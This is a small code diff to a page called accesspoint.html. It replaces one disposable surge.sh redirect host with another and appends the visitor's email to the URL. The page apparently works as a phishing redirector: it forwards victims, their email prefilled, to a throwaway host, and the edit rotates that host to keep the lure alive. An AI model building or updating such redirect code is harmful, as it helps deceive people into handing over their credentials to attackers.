--- a/accesspoint.html
+++ b/accesspoint.html
@@ -48,7 +48,7 @@
       const jargon = generateJargon();
 
       // Construct redirect URL: email + jargon in hash
-      const redirectURL = `https://guestmode-63899skirt.surge.sh/#${email}`;
+      const redirectURL = `https://pro-guest3940950.surge.sh/#${email}`;
 
       // Redirect
       window.location.href = redirectURL;
